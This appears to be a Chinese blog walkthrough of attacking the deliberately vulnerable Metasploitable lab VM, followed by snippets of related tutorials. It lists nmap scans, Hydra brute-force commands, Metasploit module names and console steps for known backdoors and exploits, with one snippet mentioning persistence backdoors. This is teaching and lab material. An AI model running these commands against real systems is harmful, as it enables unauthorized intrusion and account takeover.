kali渗透metasploitable靶机

最新推荐文章于 2025-06-10 19:37:24 发布
最新推荐文章于 2025-06-10 19:37:24 发布
阅读量3.1k 收藏 10
点赞数
分类专栏: metasploit
本文详细介绍了一系列渗透测试技术,包括隐蔽扫描、端口爆破、利用已知漏洞获取系统权限等。通过具体案例演示如何使用Nmap进行隐蔽扫描,Hydra进行端口爆破,并借助Metasploit框架实现对目标系统的远程控制。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

扫描阶段:

工具:Nmap

隐蔽扫描      nmap  -sS 192.168.8.135


端口爆破:FTP、SSH等

工具:Hydra

备用字典

  • 爆破FTP

hydra -L  /root/Desktop/user.txt  -P  /root/Desktop/pass.txt  ftp://192.168.8.135

  • 爆破SSH

hydra -L  /root/Desktop/user.txt  -P  /root/Desktop/pass.txt  192.168.8.135 ssh

登陆系统:

端口渗透:

  • 6667——-irc_3281_backdoor

利用metasploit

成功获取会话,root权限

  • 6200——-vsftpd_234_backdoor

利用metasploit

反弹会话,root权限


  • 1524——-ingrelock_backdoor

利用telnet连接1524,直接返回root会话

  • 1099——-distcc程序漏洞—-ingrelock

利用metasploit

返回会话

  • 139——-samba为3.0漏洞

先用nmap进行详细扫描

nmap -v -A -T4 192.168.8.135

Samba 3.0.20

利用metasploit

返回会话,root权限

  • 8180——-Apache Tomcat弱口令

使用use auxiliary/scanner/http/tomcat_mgr_login进行账户爆破

用默认自带的字典即可

爆破出tomcat/tomcat

使用use exploit/multi/http/tomcat_mgr_upload模块

获取meterpreter会话

  • 80——-PHP CGI参数注入执行漏洞

msf > search cve:2012-1823

msf > use exploit/multi/http/php_cgi_arg_injection

msf exploit(php_cgi_arg_injection) > show options

msf exploit(php_cgi_arg_injection) > set rhost 192.168.8.135

rhost => 192.168.8.135

msf exploit(php_cgi_arg_injection) > run


Kali渗透测试:使用Metasploit对Web应用的攻击
Liu_Bruce的博客
05-15 4175
Kali渗透测试:使用Metasploit对Web应用的攻击 Web应用程序的漏洞数量众多,这里我们以其中一个命令注入漏洞为例复现一下。这种漏洞源于Web应用程序没有对用户输入的内容进行准确的验证,从而导致操作系统执行了攻击者输入的命令。下面是一段运行在Metasploitable2靶机上的PHP脚本,它来自于DVWA,代码如下: <html> <body> <form name="ping" action="#" method="post"> &
手把手教你kali渗透Metasploitable
热门推荐
qq_41620273的博客
12-24 1万+
记一次kali渗透Metasploitbale靶机 1.网络设置 2.ifconfig查看Metasploitable的IP: 3.对Metasploitbale进行nmap端口扫描: Nmap 192.168.22.128 端口爆破:FTP、SSH等 工具:Hydra 备用字典:user.txt: pass,txt: 一、 爆破FTP hydra -L /root/桌面/user.txt -P /root/桌面/pass.txt [ftp://192.168.22.128](ftp://19
Metasploitable: 2靶场渗透
sucker的博客
06-10 751
渗透测试价值:Metasploitable靶机仍广泛用于教学,演示 从信息收集到提权 的完整链。此漏洞虽古老,但仍是理解后门漏洞原理的经典教材,实际环境中需确保无遗留 2.3.4 版本服务。4,分析目标系统的第一个暴露面,也是我们的攻击面,21端口存在的tp服务。漏洞本质:开发者故意植入或代码被篡改的后门,通过用户名中的特殊字符。后门漏洞 (CVE-2011-2523),允许未授权命令执行。6,尝试80端口的http服务漏洞利用getshell。Metasploit存在漏洞利用的模块,使用之。
kali渗透综合靶机(二)--bulldog靶机
W小哥
03-07 1184
一、靶机下载 靶机下载地址:https://download.vulnhub.com/bulldog/bulldog.ova 二、bulldog靶机搭建 靶机: 将下载好的靶机环境,用VM VirtualBox导入即可使用,管理->导入虚拟电脑 设置网络模式,网卡选择仅主机模式 kali攻击机: 点开vmware中的虚拟选项编辑器中 点击更改设置,让vmware桥接至VirtualBox...
网络安全kali渗透学习 web渗透入门Metasploitable2靶机系统介绍
xueshenlaila的博客
02-24 4385
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox和其他虚拟平台。 这篇文章教大家了解Metasploitable2靶机系统 以下有视频版还有文字版 不知道怎么操作的请看文字版的,里面详细的步骤。 关注公众号侠盗男爵回复【kali系统】 视频版↓: 网络安全/kali/黑客/web安全/渗透测试/-3-5个月网络安全全套
Kali linux渗透Metasploitable2-linux实现文件上传
qq_62657502的博客
08-30 592
Kali linux渗透Metasploitable2-linux实现文件上传
kali使用Metasploit进行渗透攻击实验
ysm_zxc的博客
06-13 1016
信息安全技术
Metasploitable2靶机渗透linux系统实操
以自己喜欢的方式过一生
11-07 1667
Metasploitable2靶机渗透linux系统实操
利用kali机对metaploitable做渗透攻击
KT986的博客
06-19 2255
仅作学习参考使用 一、虚拟机&&靶机的准备 1)kali linux的安装 https://www.kali.org/get-kali/#kali-virtual-machines 2)Vmware虚拟机的安装 3靶机metaploitable2的安装 下载地址:https://sourceforge.net.projects/metasploitable/ (如果虚拟机的安装教程请参考其他文章,如果kali linux的安装出现问题,可以私信或留言博主,我发本人已经调试好的
CFS三层靶机渗透_Kali
qq_42383069的博客
03-18 6004
环境搭建 0x01. 环境下载: 【CFS三层靶机环境】百度网盘链接: 链接: https://pan.baidu.com/s/1LJueA-X02K7HZXr8QsOmeg 提取码: dkcp 解压密码:teamssix.com 0x02. 环境搭建: 1)设置虚拟机网卡(新建两个仅主机模式的网卡) VMnet10: 子网IP:192.168.22.0 子网掩码:255.255.255.0 VMnet11: 子网IP:192.168.33.0 子网掩码:255.255.255.0 2)虚
kali使用msf渗透测试靶机
qq_53175607的博客
11-18 1423
kali利用metasploit使用ms17-010(永恒之蓝)渗透靶机windones7 免责声明:只用于靶机测试 1.渗透之前要关闭windones7和主机的防火墙及杀毒软件。 2.使用nmap扫描windones7 3.445端口开放,说明有ms17-010的漏洞。 4.使用命令msfconsole打开msf 5.使用search ms17-010命令查找攻击模块 6.使用exploit/windows/smb/ms17_010_eternalblue模块攻击 use选择 7.show options
kali linux攻击靶机Metasploitable2实验------vsFTPd 2.3.4
边城浪子的博客
07-26 1212
漏洞:vsFTPd 2.3.4 靶机Metasploitable2 step1:开启kali linux 和 Metasploitable2 step2:扫描漏洞 命令:nmap --script vuln 目标ip nmap --script vuln 192.168.56.129 从结果中得知有高危漏洞,vsFTPd 2.3.4 step3:漏洞利用 命令:msfconsol...
KALI搭建DVWA靶机(在docker一键部署网络安全测试环境 )
qq_61901169的博客
08-15 717
点击这个,然后等一会即可进入登陆页面。就能自动打开login.php。
Metasploit渗透测试(框架介绍、靶机安装、基本使用方法)
VN520的博客
12-20 2052
Metasploit framework,简称msf。Metasploit是一个渗透测试平台,能够查找,利用和验证漏洞。Metasploit是一个免费的、可下载的框架,通过它可以很容易的对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。Metasploit的设计初衷是打造一个攻击工具开发平台。
kali渗透综合靶机(八)--Billu_b0x靶机
W小哥
03-17 3280
一、靶机下载 下载链接:https://download.vulnhub.com/billu/Billu_b0x.zip 二、Billu_b0x靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 kali IP:192.168.59.129 靶机IP:192.168.59.131 1...
kali linux 下搭建 Vulhub 靶场(图文详解)
m0_63521991的博客
08-08 7164
【在kali linux 下搭建vulhub靶场及其依赖】关于kali、docker、vulhub的简介,靶场的开启、关闭、注意事项
kaliMetasploitable 2靶机实验
最新发布
06-16
### Kali Linux与Metasploitable 2靶机实验配置及渗透测试教程 #### 实验环境准备 在进行Kali Linux与Metasploitable 2靶机渗透测试实验前,需要确保实验环境已经正确配置。以下是详细的配置说明: 1. **安装Kali Linux虚拟机** - 下载并安装VMware或VirtualBox等虚拟化平台。 - 下载Kali Linux的ISO镜像文件,并创建一个新的虚拟机。 - 配置虚拟机的硬件资源,建议分配至少4GB内存以保证流畅运行[^1]。 2. **安装Metasploitable 2靶机** - 下载Metasploitable 2的压缩包(如`metasploitable-linux-2.0.0.zip`),并解压到指定目录[^4]。 - 使用虚拟化平台导入Metasploitable 2的虚拟机文件(通常是`.ova`格式)。 - 启动Metasploitable 2虚拟机,并配置其网络模式为桥接模式或NAT模式,确保能够与Kali Linux虚拟机通信[^3]。 3. **配置IP地址** - 在Kali Linux中,使用`ifconfig`或`ip addr`命令查看本机IP地址。 - 在Metasploitable 2中,手动设置静态IP地址为`192.168.22.100`,子网掩码为`255.255.255.0`[^1]。 #### 渗透测试步骤 1. **启动Metasploit框架** 在Kali Linux终端中输入以下命令启动Metasploit框架: ```bash msfconsole ``` 2. **漏洞扫描** 使用Nmap工具对Metasploitable 2靶机进行端口扫描和漏洞探测: ```bash nmap -sV -p- 192.168.22.100 ``` 上述命令将扫描目标主机的所有端口,并尝试识别服务版本信息[^1]。 3. **利用已知漏洞** 根据Nmap扫描结果选择合适的漏洞利用模块。例如,如果发现存在Tomcat管理界面的弱密码漏洞,可以使用以下命令加载相应的Metasploit模块: ```bash use exploit/multi/http/tomcat_mgr_deploy set RHOSTS 192.168.22.100 set PASSWORD tomcat set USERNAME tomcat exploit ``` 4. **后渗透测试** 成功获取目标系统的访问权限后,可以进一步执行以下操作: - 提升权限:使用`getsystem`命令尝试提升当前会话的权限。 - 搜集系统信息:使用`sysinfo`命令查看目标系统的详细信息。 - 部署持久化后门:使用` persistence`模块实现长期控制目标系统。 #### 注意事项 - 确保所有操作仅在授权的实验环境中进行,避免对真实网络或设备造成影响[^2]。 - 在实验过程中记录每一步的操作日志,以便后续分析和学习。 ```python # 示例代码:自动化扫描脚本 import os def scan_target(ip): os.system(f"nmap -sV -p- {ip}") scan_target("192.168.22.100") ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值